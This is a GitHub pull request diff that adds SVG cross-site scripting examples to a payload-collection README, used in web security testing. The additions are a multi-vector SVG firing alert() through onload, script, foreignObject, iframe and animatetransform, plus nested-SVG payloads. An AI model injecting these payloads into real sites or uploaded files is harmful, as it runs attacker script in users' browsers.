Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS in SVG: more examples + nesting #729

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

XSS in SVG: more examples + nesting #729

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
62 changes: 62 additions & 0 deletions XSS Injection/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -383,6 +383,8 @@ vbscript:msgbox("XSS")

### XSS in SVG

Simple script. Codename: green triangle

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
Expand All @@ -395,6 +397,29 @@ vbscript:msgbox("XSS")
</svg>
```

More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lignthning. Author: noraj.

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
<polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
<desc><script>alert('svg desc')</script></desc>
<foreignObject><script>alert('svg foreignObject')</script></foreignObject>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
</foreignObject>
<title><script>alert('svg title')</script></title>
<animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
<script type="text/javascript">
alert('svg script');
</script>
</svg>
```



### XSS in SVG (short)

```javascript
Expand All @@ -405,6 +430,43 @@ vbscript:msgbox("XSS")
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```

### XSS in SVG (nesting)

Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.

SVG 1.x (xlink:href)

```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
</svg>
```

Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc sicne the `style` attribute is no longer a vector on modern browsers. Author: noraj.

SVG 1.x (xlink:href)

```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
</svg>
```

However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<svg x="10">
<rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
<script type="text/javascript">alert('sub-svg 1');</script>
</svg>
<svg x="200">
<rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
<script type="text/javascript">alert('sub-svg 2');</script>
</svg>
</svg>
```

### XSS in Markdown

```csharp
Expand Down